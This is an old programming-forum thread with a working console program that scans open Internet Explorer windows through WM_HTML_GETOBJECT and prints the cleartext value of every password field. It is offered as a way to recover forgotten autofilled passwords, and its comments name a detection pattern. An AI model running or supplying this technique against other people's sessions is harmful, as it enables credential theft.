IonicWind Software

Aurora Compiler => Tips and Tricks => Topic started by: sapero on September 08, 2006, 01:20:46 PM

Title: How to grab a password
Post by: sapero on September 08, 2006, 01:20:46 PM
People forget things. If you let the browser keep a cookie and autocomplete the password for a favorite forum like ionicwind, you can end up forgetting the password itself.
You can always run third-party password-recovery software (see nirsoft.net), but then you don't know how it works!

// compile for console

// this example enumerates all passwords from all opened standard 'HTML' windows
#include "EnumHtmlPasswords.inc"
// Function pointer with the signature of oleacc.dll's ObjectFromLresult.
// main() fills it in at run time through GetProcAddress.
declare *ObjectFromLresult(int lResult, GUID* riid, int wParam, void* ppvObject),int;
// Number of password values printed so far; incremented in EnumPasswords and
// read by main() to report when nothing was found.
int g_pwsFound;


// Console entry point: resolves ObjectFromLresult, waits for a key press, then
// walks every descendant window of the desktop and hands each one to
// EnumWindowsProc, which prints the password fields of the HTML windows it finds.
global sub main()
{
// NOTE(review): "oleacc.dll" is loaded by bare name, so it is resolved through
// the DLL search order; a full system-directory path would pin the copy that
// is loaded. The LoadLibrary result is also not checked separately before it
// is passed to GetProcAddress.
ObjectFromLresult = GetProcAddress(LoadLibrary("oleacc.dll"), "ObjectFromLresult");
if (!ObjectFromLresult)
{
print("sorry, oleacc.dll::ObjectFromLresult not found"); return _getch();
}
// Fills _IID_IHTMLInputElement from four 32-bit words.
// NOTE(review): presumably this is the IID of IHTMLInputElement, as the variable
// name says; the constants are not verified here.
SetGuid(&_IID_IHTMLInputElement, 810612178,298817717,-1442807109,198098176);

print("open any site, go to login, and type any password\nthen press any key to continue\n>",);
_getch();
print("\n\n");

// Registered message id that is later sent to each candidate window; it is
// passed to the callback as the user parameter of EnumChildWindows.
UINT nMsg = RegisterWindowMessage("WM_HTML_GETOBJECT");

// COM stays initialised for the whole enumeration because the callback uses
// COM interface pointers. The CoInitialize result is not checked.
CoInitialize(NULL);
EnumChildWindows(GetDesktopWindow(), &EnumWindowsProc, nMsg);
CoUninitialize();


print("\n\nfinished.");
if (!g_pwsFound) print("no passwords found");
_getch();
}



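// EnumChildWindows callback. For each window whose class is
// "Internet Explorer_Server" it asks the window for its HTML document object
// (message id in nMsg, converted with ObjectFromLresult), prints the document
// URL and passes the document to EnumPasswords.
//
// hwnd  - window handle supplied by EnumChildWindows
// nMsg  - id returned by RegisterWindowMessage("WM_HTML_GETOBJECT") in main()
// Returns true in every case so that the enumeration continues.
//
// Security-relevant point: the document is obtained with an ordinary window
// message, so any program running in the same user session that can message
// the browser window can read the form fields the same way. For detection,
// the pattern to look for is a process registering "WM_HTML_GETOBJECT" and
// sending it to windows it does not own.
sub EnumWindowsProc(int hwnd, int nMsg),BOOL
{
    dstring classname[64];
    classname[0] = 0;
    GetClassName(hwnd, &classname, 64);

    if (classname == "Internet Explorer_Server")
    {
        // Initialised so that a failed or timed-out SendMessageTimeout cannot
        // leave an indeterminate value to be passed to ObjectFromLresult.
        DWORD dwResult = 0;
        IHTMLDocument2 *spDoc = null;

        // SMTO_ABORTIFHUNG plus the 1000 ms timeout keep a hung browser window
        // from blocking the enumeration. A zero return means the message was
        // not delivered, so dwResult holds nothing usable.
        if (SendMessageTimeout(hwnd, nMsg, 0, 0, SMTO_ABORTIFHUNG, 1000, &dwResult) && (dwResult))
        {
            // A zero (S_OK) result means spDoc now holds a reference we must release.
            if (!ObjectFromLresult(dwResult, _IID_IHTMLDocument2, 0, &spDoc) && (spDoc))
            {
                wstring* bstrUrl = null;
                if (!spDoc->get_URL(&bstrUrl) && (bstrUrl))
                {
                    print("---------------\nsite: ", w2s(*(wstring)bstrUrl));
                    SysFreeString(bstrUrl);
                }
                EnumPasswords(spDoc);
                spDoc->Release();
            }
        }
    }
    return true; // continue enumerating
}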




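// Prints the current value of every <input type="password"> element of the
// given HTML document and counts each one in g_pwsFound.
//
// spDoc - document to inspect; the caller keeps ownership of this reference.
//
// What is read is the live content of the form field (typed or autofilled by
// the browser); nothing here touches the browser's stored-password database.
// The value is written to the console in cleartext, so it also ends up in the
// console scrollback and in any file the output is redirected to.
//
// Every COM reference obtained below is released on the path that obtained it.
// The original listing never released pColl and pdisp, which leaked one
// reference to each per document.
sub EnumPasswords(IHTMLDocument2 *spDoc)
{
    IHTMLElementCollection *pColl = null;
    if (!spDoc->get_all(&pColl) && (pColl))  // document.all
    {
        VARIANT vTag;
        vTag.vt = VT_BSTR;
        vTag.bstrVal = SysAllocString(L"INPUT");
        IDispatch *pdisp = null;
        if (!pColl->tags(vTag, &pdisp) && (pdisp))  // element = document.all.tags("INPUT")
        {
            IHTMLElementCollection *pInputCollection = null;
            if (!pdisp->QueryInterface(_IID_IHTMLElementCollection, &pInputCollection) && (pInputCollection))
            {
                VARIANT vName, vIndex;
                vName.vt = VT_I4; vIndex.vt = VT_EMPTY;
                // count stays 0 if get_length fails, so the loop is skipped.
                LONG count = 0;
                pInputCollection->get_length(&count);
                for (vName.intVal=0; vName.intVal<count; vName.intVal++)
                {
                    IDispatch *pInputdisp = null;
                    if (!pInputCollection->item(vName, vIndex, &pInputdisp) && (pInputdisp))  // element[index]
                    {
                        IHTMLInputElement *input = null;
                        if (!pInputdisp->QueryInterface(_IID_IHTMLInputElement, &input) && (input))
                        {
                            wstring* bstrType = null;
                            if (!input->get_type(&bstrType) && (bstrType))  // if element[index].type = "password"
                            {
                                if (*(wstring)bstrType == L"password")
                                {
                                    wstring* bstrPassword = null;
                                    if (!input->get_value(&bstrPassword) && (bstrPassword))
                                    {
                                        g_pwsFound++;
                                        print(" - password: ",w2s(*(wstring)bstrPassword));  // print element[index].value
                                        SysFreeString(bstrPassword);
                                    }
                                }
                                SysFreeString(bstrType);
                            }
                            input->Release();
                        }
                        pInputdisp->Release();
                    }
                }
                pInputCollection->Release();
            }
            pdisp->Release();  // reference returned by tags()
        }
        SysFreeString(vTag.bstrVal);
        pColl->Release();  // reference returned by get_all()
    }
}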


include attached:
Title: Re: How to grab a password
Post by: kryton9 on September 08, 2006, 11:01:11 PM
Sapero, you are coming up with really cool stuff. Thanks for sharing.
I am amazed with all the neat things you write and how you ever figure all of this out is beyond me.
This goes for your other examples too, I just didn't want to write the same message on all of them.

Thanks.